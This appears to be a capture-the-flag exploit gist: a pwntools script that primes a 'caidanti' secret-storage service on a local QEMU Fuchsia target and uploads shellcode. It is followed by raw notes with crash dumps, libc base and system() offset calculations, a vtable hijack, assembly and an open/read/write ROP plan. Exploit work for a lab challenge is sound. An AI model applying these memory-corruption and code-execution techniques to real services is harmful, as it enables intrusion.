
@st4rk
Created Sep 16, 2019
from pwn import *
import struct
# pwntools global settings: amd64 target, debug-level logging (pwntools then
# logs the data sent and received on the tube).
context(arch='amd64', log_level='debug')

# File whose raw bytes send_shellcode() reads and uploads.
SHELLCODE_NAME = 'shell.bin'

# Tube to the challenge service. The address is IPv6 link-local (fe80::/10)
# scoped to the `qemu` interface, TCP port 31337, so it is only reachable on
# that local link. The connection is opened as soon as this line runs.
p = remote('fe80::5054:ff:fe63:5e7a%qemu', 31337)
def create_new_secret(i, size):
    """Walk through menu option 1 once to store one secret of `size` bytes.

    The key is the single byte 0x41 + i repeated `size` times and the
    initial content is the single byte 0x43 + i repeated `size` times.
    Returns after the last line of the menu has been received again.

    Args:
        i: index added to the two filler bytes; 0x43 + i must fit in one
            unsigned byte or struct.pack raises struct.error.
        size: number of filler bytes sent for the key and for the content.
    """
    p.sendline('1')
    # Both prompts are answered the same way: wait for the prompt, then send
    # `size` copies of that field's filler byte.
    for prompt, filler_base in (('Key: ', 0x41), ('Initial content: ', 0x43)):
        p.recvuntil(prompt)
        p.sendline(struct.pack('B', filler_base + i) * size)
    # Resynchronise on the final menu line before the next command.
    p.recvuntil('114514. Bring your own Cài Dān Tí')
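def send_shellcode():
    """Upload the bytes of SHELLCODE_NAME through menu option 114514.

    Selects the option, waits for the size prompt, sends the payload length
    as a decimal string, then sends the payload one byte per send() call,
    printing each byte as it goes.

    Raises:
        OSError: if SHELLCODE_NAME cannot be opened or read.
    """
    print('[-] sending shellcode')
    p.sendline('114514')
    p.recvuntil('Your code size: ')
    # The context manager closes the handle on every path; a bare `f.close`
    # (no parentheses) only names the method and never closes the file.
    with open(SHELLCODE_NAME, 'rb') as f:
        shellcode = f.read()
    p.sendline(str(len(shellcode)))
    print('[-] size: 0x%X' % len(shellcode))
    # Iterating bytes yields ints (Python 3), which is what both the
    # '0x%X' format and struct.pack('B', ...) expect.
    for i in shellcode:
        print('[-] sending byte: 0x%X' % i)
        p.send(struct.pack('B', i))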
# Read up to the last line of the menu so the service is ready for commands.
# NOTE(review): the page lost all indentation; this read is placed at module
# level because its comment describes preparing for the commands that follow,
# and send_shellcode() is placed after the loop rather than inside it.
# Confirm against the original file.
p.recvuntil('114514. Bring your own Cài Dān Tí')

# One 0x10-byte secret at index 0, then fourteen 0x80-byte secrets (1..14).
create_new_secret(0, 0x10)
for idx in range(1, 15):
    create_new_secret(idx, 0x80)

# Upload the payload file, then hand the tube over to the terminal.
send_shellcode()
p.interactive()
"""
f = open(SHELLCODE_NAME, 'rb')
shellcode = f.read()
f.close
for i in shellcode:
print('[-] hex data: 0x%X' % i)
print('[-] size: 0x%X' % len(shellcode))
[02122.186] 01413:02049> <== sw breakpoint, PC at 0x32d40b10d001
[02122.186] 01413:02049> CS: 0 RIP: 0x32d40b10d001 EFL: 0x246 CR2: 0
[02122.186] 01413:02049> RAX: 0 RBX: 0x2 RCX: 0x50b45785098a RDX: 0
[02122.186] 01413:02049> RSI: 0 RDI: 0 RBP: 0x7bd6f9ce3fe RSP: 0x43874d86ef68
[02122.186] 01413:02049> R8: 0 R9: 0 R10: 0 R11: 0x206
[02122.186] 01413:02049> R12: 0x7bd6f9d03a3 R13: 0x7045734effc0 R14: 0x7bd6f9cdea0 R15: 0x32d40b10d000
[02122.187] 01413:02049> fs.base: 0x129a0de22b38 gs.base: 0
[02122.187] 01413:02049> errc: 0
[02122.187] 01413:02049> bottom of user stack:
[02122.187] 01413:02049> 0x000043874d86ef68: 6f9d4205 000007bd 00000000 00000000 |.B.o............|
[02122.187] 01413:02049> 0x000043874d86ef78: c8748f70 000050e6 8c5f3eb0 000074ac |p.t..P...>_..t..|
[02122.187] 01413:02049> 0x000043874d86ef88: 734effc0 00007045 734effd0 00007045 |..NsEp....NsEp..|
[02122.187] 01413:02049> 0x000043874d86ef98: 00000001 00000000 4d86eff0 00004387 |...........M.C..|
[02122.187] 01413:02049> 0x000043874d86efa8: 8c5ab7b8 000074ac 734effd0 00007045 |..Z..t....NsEp..|
[02122.187] 01413:02049> 0x000043874d86efb8: 00000001 00000000 00000000 00000000 |................|
[02122.187] 01413:02049> 0x000043874d86efc8: 00000024 00000000 8c5634a0 000074ac |$........4V..t..|
[02122.187] 01413:02049> 0x000043874d86efd8: 00000009 00000000 f18e14b3 00000000 |................|
[02122.187] 01413:02049> 0x000043874d86efe8: c8748e80 000050e6 c8748fd0 000050e6 |..t..P....t..P..|
[02122.187] 01413:02049> 0x000043874d86eff8: 00000000 00000000 |................|
[02122.187] 01413:02049> arch: x86_64
[02122.193] 01413:02049> dso: id=3bbb161daecb4232 base=0x74ac8c546000 name=libc.so
[02122.193] 01413:02049> dso: id=6fe653e43b2b5e45 base=0x6e8abbcf8000 name=libc++abi.so.1
[02122.193] 01413:02049> dso: id=c200204d0d41e6bb base=0x6273815a7000 name=libunwind.so.1
[02122.193] 01413:02049> dso: id=5d8e98cee74051fe base=0x50b457849000 name=<vDSO>
[02122.193] 01413:02049> dso: id=5aa1a22b01f749ba base=0x491885fa1000 name=libasync-default.so
[02122.193] 01413:02049> dso: id=0e2ccaeccb00d6ab base=0x25879c2c2000 name=libfdio.so
[02122.193] 01413:02049> dso: id=c27f348845222148 base=0xf2d0e849000 name=libc++.so.2
[02122.193] 01413:02049> dso: id=2aa6571acee24348 base=0x7bd6f9cd000 name=app:/pkg/bin/caidanti
idea:
000076ac353f30a0
read the stack (RSP), get libc address and calculate address to system and call it
target: SP + 0x40
libc_base =
0x74ac8c5f3eb0 - 0x74ac8c546000
0x74ac8c5634a0
0x74ac8c546000
; start_main
0x74ac8c5ab7b8 - 0x74ac8c546000
8c5634a0
0x117B8 -- _text start
_text_start to system add + 0x35060
.text:00000000000657B6 call qword ptr [p]
.text:00000000000657B8 mov edi, eax ; status
.text:00000000000657BA call _exit
0x54000
; calculate system address
MOV RAX, 0x35030 ; 0x35060
ADD RBX, RAX
;LEA RDI, [REL pop_shell]
MOV RDI, 0
JMP RBX
[01349.773] 01413:01988> {{{bt:1:0x2547f1dee060:sp 0x221dc0fb7f68}}}
[01349.773] 01413:01988> crashsvc: failed to pass exception to handler [thread 12353.12355]: ZX_ERR_PEER_CLOSED (-24)
[01353.018] 01413:01988> <== fatal exception: process /pkg/bin/caidanti[12526] thread initial-thread[12528]
[01353.018] 01413:01988> <== read not-present page fault, PC at 0x7fbb00a5022b
[01353.018] 01413:01988> CS: 0 RIP: 0x7fbb00a5022b EFL: 0x202 CR2: 0xb2
[01353.018] 01413:01988> RAX: 0x10 RBX: 0x4c9545f74c70 RCX: 0x26 RDX: 0x10
[01353.018] 01413:01988> RSI: 0x1 RDI: 0x4c9545f74c70 RBP: 0x4c9545f74f58 RSP: 0x4c9545f74f18
[01353.018] 01413:01988> R8: 0x10 R9: 0 R10: 0x7fbb00a50200 R11: 0x286
[01353.018] 01413:01988> R12: 0x5d7fa7e0e3a3 R13: 0x26 R14: 0x1 R15: 0x10
[01353.018] 01413:01988> fs.base: 0x48dbf5645b38 gs.base: 0
[01353.018] 01413:01988> errc: 0x4
[01353.018] 01413:01988> bottom of user stack:
0x7fbb00a5022b
0x7fbb00a50200
turns out I need to use open from fdio, let's calculate it
[03070.903] 01413:01988> <== sw breakpoint, PC at 0xff931234002
[03070.903] 01413:01988> CS: 0 RIP: 0xff931234002 EFL: 0x246 CR2: 0
[03070.903] 01413:01988> RAX: 0 RBX: 0x7b RCX: 0x7eab62dd698a RDX: 0
[03070.903] 01413:01988> RSI: 0 RDI: 0 RBP: 0x6cf45fc223fe RSP: 0x35c1272f3f68
[03070.903] 01413:01988> R8: 0 R9: 0 R10: 0 R11: 0x206
[03070.903] 01413:01988> R12: 0x6cf45fc243a3 R13: 0x2d417260fc0 R14: 0x6cf45fc21ea0 R15: 0xff931234000
[03070.903] 01413:01988> fs.base: 0x6b4f2ffcab38 gs.base: 0
[03070.903] 01413:01988> errc: 0
[03070.903] 01413:01988> bottom of user stack:
[03070.903] 01413:01988> 0x000035c1272f3f68: 5fc28205 00006cf4 00000000 00000000 |..._.l..........|
[03070.903] 01413:01988> 0x000035c1272f3f78: 5a6d0f70 00005061 1825eeb0 00004bf4 |p.mZaP....%..K..|
[03070.903] 01413:01988> 0x000035c1272f3f88: 17260fc0 000002d4 17260fd0 000002d4 |..&.......&.....|
[03070.903] 01413:01988> 0x000035c1272f3f98: 00000001 00000000 272f3ff0 000035c1 |.........?/'.5..|
[03070.903] 01413:01988> 0x000035c1272f3fa8: 182167b8 00004bf4 17260fd0 000002d4 |.g!..K....&.....|
[03070.903] 01413:01988> 0x000035c1272f3fb8: 00000001 00000000 00000000 00000000 |................|
[03070.903] 01413:01988> 0x000035c1272f3fc8: 00000024 00000000 181ce4a0 00004bf4 |$............K..|
[03070.903] 01413:01988> 0x000035c1272f3fd8: 00000009 00000000 89af5ceb 00000000 |.........\......|
[03070.903] 01413:01988> 0x000035c1272f3fe8: 5a6d0e80 00005061 5a6d0fd0 00005061 |..mZaP....mZaP..|
[03070.903] 01413:01988> 0x000035c1272f3ff8: 00000000 00000000 |................|
[03070.903] 01413:01988> arch: x86_64
[03070.906] 01413:01988> dso: id=5d8e98cee74051fe base=0x7eab62dcf000 name=<vDSO>
[03070.906] 01413:01988> dso: id=2aa6571acee24348 base=0x6cf45fc21000 name=app:/pkg/bin/caidanti
[03070.906] 01413:01988> dso: id=c200204d0d41e6bb base=0x54436ae41000 name=libunwind.so.1
[03070.906] 01413:01988> dso: id=3bbb161daecb4232 base=0x4bf4181b1000 name=libc.so
[03070.906] 01413:01988> dso: id=c27f348845222148 base=0x46a69fb49000 name=libc++.so.2
[03070.906] 01413:01988> dso: id=6fe653e43b2b5e45 base=0x3a571be28000 name=libc++abi.so.1
[03070.906] 01413:01988> dso: id=5aa1a22b01f749ba base=0x11097e751000 name=libasync-default.so
[03070.906] 01413:01988> dso: id=0e2ccaeccb00d6ab base=0xfd38fc51000 name=libfdio.so
0x6cf45fc28205
0x6cf45fc21000
0x7205
0x600B
offset to base address: 0x11FA
vtable + 0x20 == read_content of secret
LOAD:0000000000011020 u_obj_vtable dq offset u_obj_ctor ; DATA XREF: create_service_object+2C↑o
LOAD:0000000000011028 dq offset u_obj_dtor
LOAD:0000000000011030 dq offset sub_7590
LOAD:0000000000011038 dq offset sub_7750
LOAD:0000000000011040 dq offset sub_79C0 -- update_content/read_content
LOAD:0000000000011048 dq offset sub_7C70
LOAD:0000000000011050 dq offset sub_7E40
LOAD:0000000000011058 dq offset sub_7F00
LOAD:0000000000011060 unk_11060 db 3
v12 = *(_QWORD *)(stack_buffer - 56);
v13 = *((unsigned __int8 *)input_buffer + 23);
if ( (v13 & 0x80u) != 0LL )
v13 = *((_QWORD *)input_buffer + 1);
*(_QWORD *)(v12 + 16) = v13;
*(_QWORD *)(v12 + 24) = 0xFFFFFFFFFFFFFFFFLL;
v14 = *((unsigned __int8 *)input_buffer + 23);
v15 = v23;
if ( (v14 & 0x80u) != 0LL )
v14 = *((_QWORD *)input_buffer + 1);
v22 = stack_buffer - 88;
v16 = (void *)(*(_QWORD *)(stack_buffer - 56) + sub_8E60(stack_buffer - 56, v14, v10, v11, stack_buffer));
v17 = *((unsigned __int8 *)input_buffer + 23);
if ( (v17 & 0x80u) != 0LL )
{
v18 = *(void **)input_buffer;
v17 = *((_QWORD *)input_buffer + 1);
}
else
{
v18 = input_buffer;
}
v19 = (_QWORD *)(stack_buffer - 8);
memcpy(v16, v18, v17);
sub_8F90(stack_buffer -
case 5: // list secrets
*((_OWORD *)stack_buffer - 2) = 0LL;
*((_QWORD *)stack_buffer - 2) = 0LL;
v10 = (*(__int64 (__fastcall **)(__int64, char *))(*(_QWORD *)service_obj + 0x18LL))(
service_obj,
stack_buffer - 32);
[05362.890] 01413:02251> crashsvc: failed to pass exception to handler [thread 14259.14261]: ZX_ERR_PEER_CLOSED (-24)
[05392.322] 01413:02251> <== fatal exception: process /pkg/bin/caidanti[14598] thread initial-thread[14600]
[05392.322] 01413:02251> <== sw breakpoint, PC at 0x1a20970a516c
[05392.322] 01413:02251> CS: 0 RIP: 0x1a20970a516c EFL: 0x206 CR2: 0
[05392.322] 01413:02251> RAX: 0x4141414141414141 RBX: 0x2bfecd3be000 RCX: 0x564fa688c975 RDX: 0
[05392.322] 01413:02251> RSI: 0x499eb04a6000 RDI: 0 RBP: 0x2bfecd3b93fe RSP: 0x499eb04a6000
[05392.322] 01413:02251> R8: 0 R9: 0 R10: 0 R11: 0x206
[05392.322] 01413:02251> R12: 0x2bfecd3c8cc0 R13: 0x79fab848dfc0 R14: 0x2bfecd3ca140 R15: 0x1a20970a5000
[05392.322] 01413:02251> fs.base: 0x62980c45ab38 gs.base: 0
[05392.322] 01413:02251> errc: 0
[05392.322] 01413:02251> bottom of user stack:
[05392.322] 01413:02251> 0x0000499eb04a6000: 41414141 41414141 00000000 00000000 |AAAAAAAA........|
[05392.322] 01413:02251> 0x0000499eb04a6010: 00000000 00000000 00000000 00000000 |................|
[05392.322] 01413:02251> 0x0000499eb04a6020: 00000000 00000000 00000000 00000000 |................|
[05392.322] 01413:02251> 0x0000499eb04a6030: 353f30a0 000076ac 00000000 00000000 |.0?5.v..........|
[05392.322] 01413:02251> 0x0000499eb04a6040: 00000000 00000000 00000000 00000000 |................|
[05392.322] 01413:02251> 0x0000499eb04a6050: d7659000 00001530 00000000 00000000 |..e.0...........|
[05392.322] 01413:02251> 0x0000499eb04a6060: 5fa56fb0 00003641 00000001 00000000 |.o._A6..........|
[05392.323] 01413:02251> 0x0000499eb04a6070: 41414141 41414141 41414141 41414141 |AAAAAAAAAAAAAAAA|
[05392.323] 01413:02251> 0x0000499eb04a6080: 00000000 10000000 41414141 41414141 |........AAAAAAAA|
[05392.323] 01413:02251> 0x0000499eb04a6090: 41414141 41414141 00000000 00000000 |AAAAAAAA........|
[05392.323] 01413:02251> 0x0000499eb04a60a0: 00000000 00000000 00000000 00000000 |................|
[05392.323] 01413:02251> 0x0000499eb04a60b0: 00000000 00000000 00000000 00000000 |................|
[05392.323] 01413:02251> 0x0000499eb04a60c0: 00000000 00000000 00000000 00000000 |................|
[05392.323] 01413:02251> 0x0000499eb04a60d0: 00000000 00000000 00000000 00000000 |................|
[05392.323] 01413:02251> 0x0000499eb04a60e0: 00000000 00000000 00000000 00000000 |................|
[05392.323] 01413:02251> 0x0000499eb04a60f0: 00000000 00000000 00000000 00000000 |................|
SHARED MEMORY + 0x30 == vtable_for_unk_obj
vtable_for_unk_obj - 0xE0A0 == .text base
[06283.807] 01413:02251> 0x00007d293f39dfe0: c5e415df 00000000 6797ce60 0000424c |........`..gLB..|
[06283.807] 01413:02251> 0x00007d293f39dff0: 6797cfd0 0000424c 00000000 00000000 |...gLB..........|
[06283.807] 01413:02251> arch: x86_64
[06283.819] 01413:02251> dso: id=c09087b32b943945 base=0x60785719e000 name=app:/pkg/bin/caidanti-storage-servi
[06283.819] 01413:02251> dso: id=0e2ccaeccb00d6ab base=0x586c82a9e000 name=libfdio.so
[06283.819] 01413:02251> dso: id=5d8e98cee74051fe base=0x5616838b0000 name=<vDSO>
[06283.819] 01413:02251> dso: id=6fe653e43b2b5e45 base=0x54da4878e000 name=libc++abi.so.1
[06283.819] 01413:02251> dso: id=3bbb161daecb4232 base=0x50e7f3acf000 name=libc.so
[06283.819] 01413:02251> dso: id=c200204d0d41e6bb base=0x18f24db0f000 name=libunwind.so.1
[06283.819] 01413:02251> dso: id=5aa1a22b01f749ba base=0xe0aa5043000 name=libasync-default.so
[06283.819] 01413:02251> dso: id=c27f348845222148 base=0x18ded4d4000 name=libc++.so.2
[06283.819] 01413:02251> {{{reset}}}
[06283.759] 01413:02251> bottom of user stack:
[06283.759] 01413:02251> 0x000026c776304000: 76304008 000026c7 571a32c7 00006078 |.@0v.&...2.Wx`..|
[06283.759] 01413:02251> 0x000026c776304010: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c776304020: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c776304030: 571b10a0 00006078 00000000 00000000 |...Wx`..........|
[06283.759] 01413:02251> 0x000026c776304040: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c776304050: 63b6d000 00007a5f 00000000 00000000 |...c_z..........|
[06283.759] 01413:02251> 0x000026c776304060: 52255fb0 00000d41 00000001 00000000 |._%RA...........|
[06283.759] 01413:02251> 0x000026c776304070: 41414141 41414141 41414141 41414141 |AAAAAAAAAAAAAAAA|
[06283.759] 01413:02251> 0x000026c776304080: 00000000 10000000 41414141 41414141 |........AAAAAAAA|
[06283.759] 01413:02251> 0x000026c776304090: 41414141 41414141 00000000 00000000 |AAAAAAAA........|
[06283.759] 01413:02251> 0x000026c7763040a0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c7763040b0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c7763040c0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c7763040d0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c7763040e0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> 0x000026c7763040f0: 00000000 00000000 00000000 00000000 |................|
[06283.759] 01413:02251> arch: x86_64
[06283.762] 01413:02251> dso: id=2aa6571acee24348 base=0x7ff034b1a000 name=app:/pkg/bin/caidanti
[06283.762] 01413:02251> dso: id=5d8e98cee74051fe base=0x77b728d7c000 name=<vDSO>
[06283.762] 01413:02251> dso: id=c27f348845222148 base=0x771ca9160000 name=libc++.so.2
[06283.762] 01413:02251> dso: id=3bbb161daecb4232 base=0x76f36dee7000 name=libc.so
[06283.762] 01413:02251> dso: id=c200204d0d41e6bb base=0x56bc198a5000 name=libunwind.so.1
[06283.762] 01413:02251> dso: id=5aa1a22b01f749ba base=0x302dd59ae000 name=libasync-default.so
[06283.762] 01413:02251> dso: id=0e2ccaeccb00d6ab base=0x220f479fb000 name=libfdio.so
[06283.762] 01413:02251> dso: id=6fe653e43b2b5e45 base=0xf84964c0000 name=libc++abi.so.1
[06283.762] 01413:02251> {{{reset}}}
[06283.820] 01413:02251> {{{module:0:libc++.so.2:elf:c27f348845222148}}}
[06283.822] 01413:02251> {{{mmap:0x18ded4d4000:0x53000:load:0:r:0}}}
[06283.822] 01413:02251> {{{mmap:0x18ded527000:0x76000:load:0:rx:0x53000}}}
[06283.822] 01413:02251> {{{mmap:0x18ded59d000:0x5000:load:0:rw:0xc9000}}}
[06283.822] 01413:02251> {{{mmap:0x18ded5a2000:0x3000:load:0:rw:0xce000}}}
[06283.822] 01413:02251> {{{module:0x1:libasync-default.so:elf:5aa1a22b01f749ba}}}
[06283.822] 01413:02251> {{{mmap:0xe0aa5043000:0x1000:load:0x1:r:0}}}
[06283.823] 01413:02251> {{{mmap:0xe0aa5044000:0x1000:load:0x1:rx:0x1000}}}
[06283.823] 01413:02251> {{{mmap:0xe0aa5045000:0x1000:load:0x1:rw:0x2000}}}
[06283.823] 01413:02251> {{{module:0x2:libunwind.so.1:elf:c200204d0d41e6bb}}}
[06283.823] 01413:02251> {{{mmap:0x18f24db0f000:0x4000:load:0x2:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x18f24db13000:0x6000:load:0x2:rx:0x4000}}}
[06283.823] 01413:02251> {{{mmap:0x18f24db19000:0x1000:load:0x2:rw:0xa000}}}
[06283.823] 01413:02251> {{{mmap:0x18f24db1a000:0x1000:load:0x2:rw:0xb000}}}
[06283.823] 01413:02251> {{{module:0x3:libc.so:elf:3bbb161daecb4232}}}
[06283.823] 01413:02251> {{{mmap:0x50e7f3acf000:0x54000:load:0x3:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x50e7f3b23000:0x57000:load:0x3:rx:0x54000}}}
[06283.823] 01413:02251> {{{mmap:0x50e7f3b7a000:0x2000:load:0x3:rw:0xab000}}}
[06283.823] 01413:02251> {{{mmap:0x50e7f3b7c000:0x3000:load:0x3:rw:0xad000}}}
[06283.823] 01413:02251> {{{module:0x4:libc++abi.so.1:elf:6fe653e43b2b5e45}}}
[06283.823] 01413:02251> {{{mmap:0x54da4878e000:0x16000:load:0x4:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x54da487a4000:0x1b000:load:0x4:rx:0x16000}}}
[06283.823] 01413:02251> {{{mmap:0x54da487bf000:0x3000:load:0x4:rw:0x31000}}}
[06283.823] 01413:02251> {{{mmap:0x54da487c2000:0x1000:load:0x4:rw:0x34000}}}
[06283.823] 01413:02251> {{{module:0x5:libzircon.so:elf:5d8e98cee74051fe}}}
[06283.823] 01413:02251> {{{mmap:0x5616838b0000:0x7000:load:0x5:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x5616838b7000:0x1000:load:0x5:rx:0x7000}}}
[06283.823] 01413:02251> {{{module:0x6:libfdio.so:elf:0e2ccaeccb00d6ab}}}
[06283.823] 01413:02251> {{{mmap:0x586c82a9e000:0xe000:load:0x6:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x586c82aac000:0x31000:load:0x6:rx:0xe000}}}
[06283.823] 01413:02251> {{{mmap:0x586c82add000:0x3000:load:0x6:rw:0x3f000}}}
[06283.823] 01413:02251> {{{mmap:0x586c82ae0000:0x4000:load:0x6:rw:0x42000}}}
[06283.823] 01413:02251> {{{module:0x7:<VMO#16036=caidanti-storage-service>:elf:c09087b32b943945}}}
[06283.823] 01413:02251> {{{mmap:0x60785719e000:0x5000:load:0x7:r:0}}}
[06283.823] 01413:02251> {{{mmap:0x6078571a3000:0xe000:load:0x7:rx:0x5000}}}
[06283.823] 01413:02251> {{{mmap:0x6078571b1000:0x1000:load:0x7:rw:0x13000}}}
[06283.823] 01413:02251> {{{mmap:0x6078571b2000:0x1000:load:0x7:rw:0x14000}}}
[06283.823] 01413:02251> {{{bt:1:0x6078571a3276:sp 0x7d293f39df40}}}
[06283.824] 01413:02251> {{{bt:2:0x50e7f3b347b8:sp 0x7d293f39dfb0}}}
[06283.825] 01413:02251> {{{bt:3:0:sp 0x7d293f39e000}}}
00006078571b10a0
000017c7a44c99b0
STRATEGY:
1. ROP chain
2. open
3. read
4. print using write
"""